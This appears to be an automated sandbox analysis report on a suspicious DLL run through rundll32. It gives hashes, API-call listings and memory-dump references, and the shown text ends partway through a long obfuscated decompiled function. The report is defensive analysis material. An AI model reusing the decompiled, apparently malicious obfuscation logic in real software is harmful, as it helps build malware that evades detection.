Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction ID: a3b19fe513b9acc275f01d85060012581a435661a780a4f37598abc0634a770d
Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction Fuzzy Hash: D8A13473B0C6969FE7028E58CC907AABBE5EF45314F3541ADD594AB381DB388942C790

Uniqueness

Uniqueness Score: -1.00%

Function 6DE26102, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6DE40EA8,00000000,00000000,008B018B,6DE1DA1E,?,00000004,00000001,6DE40EA8,0000007F,?,008B018B,00000001), ref: 6DE2614F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6DE261D8
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6DE261EA
__freea.LIBCMT ref: 6DE261F3

Part of subcall function 6DE1F26D: RtlAllocateHeap.NTDLL(00000000,6DDD75D9,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004,00000000,00000000,00000000), ref: 6DE1F29F

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 9a217ffbeced6583780a18135e4a06501a8611fa1dc4b333464ef08db2a04478
Instruction ID: bc889ae5b061b3cec9eb5cc740b88735bbe4a279e48eea8534357c2d218feb90
Opcode Fuzzy Hash: 9a217ffbeced6583780a18135e4a06501a8611fa1dc4b333464ef08db2a04478
Instruction Fuzzy Hash: 8231B272A0021A9BDF158FA4CC81EBE3BA5EB40714F21426DFC18E7251EB35D951CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE23E7F, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6DE23E26,?,00000000,00000000,00000000,?,6DE241BD,00000006,FlsSetValue), ref: 6DE23EB1
GetLastError.KERNEL32(?,6DE23E26,?,00000000,00000000,00000000,?,6DE241BD,00000006,FlsSetValue,6DE41C58,FlsSetValue,00000000,00000364,?,6DE1D6D1), ref: 6DE23EBD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6DE23E26,?,00000000,00000000,00000000,?,6DE241BD,00000006,FlsSetValue,6DE41C58,FlsSetValue,00000000), ref: 6DE23ECB

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 4b1b3d891d4def1192ff3fc3c92346858ed77147735ea6208d52c5f325531f0e
Instruction ID: 1e572a207d9454022c087245def828fd3b322e011d6f3c7f5d01e2d9a190230e
Opcode Fuzzy Hash: 4b1b3d891d4def1192ff3fc3c92346858ed77147735ea6208d52c5f325531f0e
Instruction Fuzzy Hash: 6801F73676532B9BCF328A698C45E6B77ECAF067B57210128F909E7240DF21D845CEE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE1558, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDE155F
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDE1594

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

numpunct.LIBCPMT ref: 6DDE15A5

Part of subcall function 6DDE0143: __EH_prolog3.LIBCMT ref: 6DDE014A

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDE15B6

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 8c414f8af6234480d7777d2ef4a38df76f331e0d493ef78d84aa5116e603c1f0
Instruction ID: 8dbf1575f39f9a1ba529aaa11965bfb2d55b1d26fa2371917e62e11543cc127a
Opcode Fuzzy Hash: 8c414f8af6234480d7777d2ef4a38df76f331e0d493ef78d84aa5116e603c1f0
Instruction Fuzzy Hash: 400181B1A44216DADB00EBA4C850BAE7B74AF447C8F520119F65AAB285CBB04A01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE14EC, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDE14F3
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDE1528

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

numpunct.LIBCPMT ref: 6DDE1539

Part of subcall function 6DDE0110: __EH_prolog3.LIBCMT ref: 6DDE0117

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDE154A

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 76712bcb35f13ad29f84de4ccea538627ee2f7b1ecc31a1f0b89fbba5a280776
Instruction ID: 6101de75cbd1e4fbecb04ea3cb25b8c15983ac3c3ec19f1310d45bcbca4d8902
Opcode Fuzzy Hash: 76712bcb35f13ad29f84de4ccea538627ee2f7b1ecc31a1f0b89fbba5a280776
Instruction Fuzzy Hash: B0018671A44226DBDB01EBA8C940BFE7B75AF047C4F12001AF61AAB245CF704A01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEC229, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDEC230
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDEC265

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

numpunct.LIBCPMT ref: 6DDEC276

Part of subcall function 6DDEBD9F: __EH_prolog3.LIBCMT ref: 6DDEBDA6

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDEC287

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: fdf846d3860289edb1d1f743b232ee5815edc55f5daff1b23e05ee8ca3c351c2
Instruction ID: 1c88ec565e87d71766ee54ac0dd10678b60a1499e817ec9009b384377bf10ec5
Opcode Fuzzy Hash: fdf846d3860289edb1d1f743b232ee5815edc55f5daff1b23e05ee8ca3c351c2
Instruction Fuzzy Hash: 2D018171944216DBDB10EFA8C880BAE7B74AF047C4F160119F655AB281CBB04A01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDB968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6DDDB96F

Part of subcall function 6DDDA2F1: __EH_prolog3.LIBCMT ref: 6DDDA2F8
Part of subcall function 6DDDA2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA302
Part of subcall function 6DDDA2F1: int.LIBCPMT ref: 6DDDA319
Part of subcall function 6DDDA2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA373

_Find_unchecked1.LIBCPMT ref: 6DDDBB80

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6DDDB9D7

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: 5e8844bfe12fb4a48cb16b11f97b3c23bd2c812ff56f61fcc1f73d305a295921
Instruction ID: 59fe766d3428c9f0ed1ee0a4be10d949a74bfeea25148cf71f12dbd86d77a438
Opcode Fuzzy Hash: 5e8844bfe12fb4a48cb16b11f97b3c23bd2c812ff56f61fcc1f73d305a295921
Instruction Fuzzy Hash: 2FC19130D08289CEDF52EFB8C890BEDBBB1AF45308F165099E4956B287DB709945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DE160ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6DE1617D

Strings

pow, xrefs: 6DE16155, 6DE16172

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 4aaa1e528f77585ff62479aad81314563eab47cd08ec6373f1b6e551eb697328
Instruction ID: 4c618ec036994b880903427c504d54798fdaca35c0edc814361042cc57fea77b
Opcode Fuzzy Hash: 4aaa1e528f77585ff62479aad81314563eab47cd08ec6373f1b6e551eb697328
Instruction Fuzzy Hash: DE515371F1D20386DB067B28CD0036A3BF4AB4174AF308D5CE4A992399EF7584C6CA96

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2DBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6DE2DE50,?,00000050,?,?,?,?,?), ref: 6DE2DC8A

Strings

ACP, xrefs: 6DE2DBCD
OCP, xrefs: 6DE2DC03

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 97abedab3c99ed6679d1a9ec7a61216f9cb5d4ff21493e2eb69beba77d3a1d13
Instruction ID: d1e9d7ad9d66f59e838dbbca647a725537e83a1a93f0a3517ccd16a758c1e891
Opcode Fuzzy Hash: 97abedab3c99ed6679d1a9ec7a61216f9cb5d4ff21493e2eb69beba77d3a1d13
Instruction Fuzzy Hash: 2521C76AA48106A6E714CE14CD02BA773AAAFD4B68F728424EB45E7304EF72D94183D0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEFAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

`nm, xrefs: 6DDEFB65
Tnm, xrefs: 6DDEFB44

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Tnm$`nm
API String ID: 0-161697708
Opcode ID: 21f7894fcba99069b7eefa7634b426eda3ebc13a6d727f1769efbe79bbe5e0a1
Instruction ID: e10edf998502fe9cf1a2bd5a145b442c75ffdda1d99aa5e2b94bbceb1c3a4de4
Opcode Fuzzy Hash: 21f7894fcba99069b7eefa7634b426eda3ebc13a6d727f1769efbe79bbe5e0a1
Instruction Fuzzy Hash: 4211A732D06615D6DF01EF78D9007EE77E55B02768F11415BEA10EF181D7B1D6058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD3751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6DDD3758
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD37E2

Strings

961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6DDD37BA

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
API String ID: 2985221223-1287915644
Opcode ID: 9bd5bdbbfa353bde0ced89aa7b22e1d2056b119dc7530a5877c9ffff273a633d
Instruction ID: 12b33f3c075e8807ee77d3abe2eaef285a18a6daae0c2c21b8defe568f68e078
Opcode Fuzzy Hash: 9bd5bdbbfa353bde0ced89aa7b22e1d2056b119dc7530a5877c9ffff273a633d
Instruction Fuzzy Hash: D0016DF286CA05FBDF81BF64C9417ACB2E4BF26366F22851AF1C0A6040DBB41585C762

Uniqueness

Uniqueness Score: -1.00%

Function 6DE24B79, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,235275DE,235275DE,00000000,00000000,00000000,00000000,00000000), ref: 6DE24C0F
GetLastError.KERNEL32 ref: 6DE24C1D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6DE24C78

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 035e4c005c87b44f7b02fbb491c349471c144d3d815887ecafa7112123b83920
Instruction ID: 288bda7154555f8af1ffb8620a1bed8bfbe0c094c54c8ad6ccb09de043c99e3e
Opcode Fuzzy Hash: 035e4c005c87b44f7b02fbb491c349471c144d3d815887ecafa7112123b83920
Instruction Fuzzy Hash: F341E574604207EFEB159FA8CC45B7A7BB4EF6A328F31815AE955BB290DF318901C750

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4676 Parent PID: 2964 rundll32.exeCOMMON

Executed Functions

Function 6DDD1285, Relevance: 40.8, APIs: 3, Strings: 20, Instructions: 597
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDD1285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6DDF00AC(0x6de37e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6de95a90; // 0x17f0f31b
				_t127 =  *0x6de959d0; // 0x96574ad2
				_t261 =  *0x6de959d8; // 0x69aaf581
				_t380 =  *0x6de959dc; // 0x0
				_t358 =  *0x6de95a00; // 0x0
				_t405 = 0 - _t380;
				_t327 =  *0x6de95a90; // 0x17f0f31b
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6de95a58 =  *0x6de95a58 + 0xfffffd1c;
					 *0x6de95a00 = _t358;
					asm("adc dword [0x6de95a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6de959d8 = _t261;
					asm("adc esi, eax");
					 *0x6de959dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6de959e6 & 0x0000ffff;
				_t131 = 0x6de959e6;
				 *(_t400 - 0x2c) = 0x6de959e6;
				 *(_t400 - 0x1c) = 0x6de959e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6DDF01E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6de959d8 = _t261;
						 *0x6de959dc = _t380;
						 *0x6de95a90 = _t327;
						if(_t327 != ( *0x6de959f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6de95a44);
				_t135 = 6;
				_t411 =  *0x6de95a98 - _t135; // 0x6de3e664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6de959d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6de959dc = _t380;
				} else {
					_t412 =  *0x6de95a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6de959d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA(0x6deac8d8, 0x56d);
				_t381 =  *0x6de95a00; // 0x0
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6de959e6;
				 *0x6de95a90 = _t139 -  *0x6de95a90 +  *0x6de959d0;
				_t142 =  *0x6de959e6 & 0x0000ffff;
				 *0x6de959d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6de959dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6DDF01E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6de959d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6de959dc = _t256;
						 *0x6de95a90 = _t381;
						if(_t381 != ( *0x6de959f0 & 0x0000ffff)) {
							_t381 =  *0x6de95a00; // 0x0
							_t142 =  *0x6de959e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6de95a44);
				 *0x6de959d0 = E6DDD0D32();
				GetTempPathA(0x56d, 0x6deac218);
				_t417 =  *0x6de95a04 - 0x1b47; // 0xac
				if(_t417 == 0) {
					_t318 =  *0x6de95a90; // 0x17f0f31b
					_t319 = _t318 + ( *0x6de959e6 & 0x0000ffff);
					 *0x6de95a90 = _t319;
					_push(0);
					_t320 =  *0x6de959d8; // 0x69aaf581
					asm("adc [0x6de959dc], eax");
					 *0x6de959d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6DDD0D32();
				_t402 = _t401 - 0x10;
				 *0x6de959d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6DDD5DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6DDD4197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6DDD1E10(_t149);
				_t270 = 6;
				_t418 =  *0x6de95a02 - _t270; // 0x0
				if(_t418 == 0) {
					_t151 =  *0x6de959d8; // 0x69aaf581
					_t153 = _t151 + 0x11dde +  *0x6de959d0;
					__eflags = _t153;
					 *0x6de95a90 = _t153;
				} else {
					_t315 =  *0x6de959d8; // 0x69aaf581
					 *0x6de959d0 =  *0x6de959d0 +  ~_t315 -  *0x6de95a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6DE1179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6de959d0; // 0x96574ad2
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0x9657479a
				_t272 = _t25;
				 *0x6de95a90 = _t272;
				_t419 =  *0x6de95a02 - _t155; // 0x0
				if(_t419 == 0) {
					_t331 =  *0x6de95a00; // 0x0
					_t156 = 0;
					 *0x6de959dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6de959d8 = _t333;
				} else {
					_t333 =  *0x6de959d8; // 0x69aaf581
					_t156 =  *0x6de959dc; // 0x0
					 *0x6de95a90 = _t272 - _t333 * 0x3d -  *0x6de95a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6DDD4401(_t260, E6DDD4401(_t260, E6DDD1FF2(_t260, E6DDD20D9(_t260, E6DDD4267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6de98150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6de95a00; // 0x0
				_t277 = 0x6de95a0e;
				_t362 =  *0x6de959dc; // 0x0
				_t383 =  *0x6de959d8; // 0x69aaf581
				do {
					if(_t336 != ( *0x6de959e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0x5
						_t245 = _t26 + _t383;
						 *0x6de95a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6de959e2);
				_push("cd Matter m");
				 *0x6de959d8 = _t383;
				 *0x6de959dc = _t362; // executed
				E6DE1179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6de95a98 - _t164; // 0x6de3e664
				if(_t422 != 0) {
					L34:
					 *0x6de959d8 =  *0x6de959d8 - 0x27 +  *0x6de959d0 * 0x3d;
					asm("sbb [0x6de959dc], ecx");
				} else {
					_t423 =  *0x6de95a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6de959d8; // 0x69aaf581
						 *0x6de959d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6de95a90 =  *0x6de95a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6DDD4197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6DDD1E10(_t169);
				_t281 = 0x27;
				_t171 = E6DDD0EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6de959d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6de959dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6DDD5DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
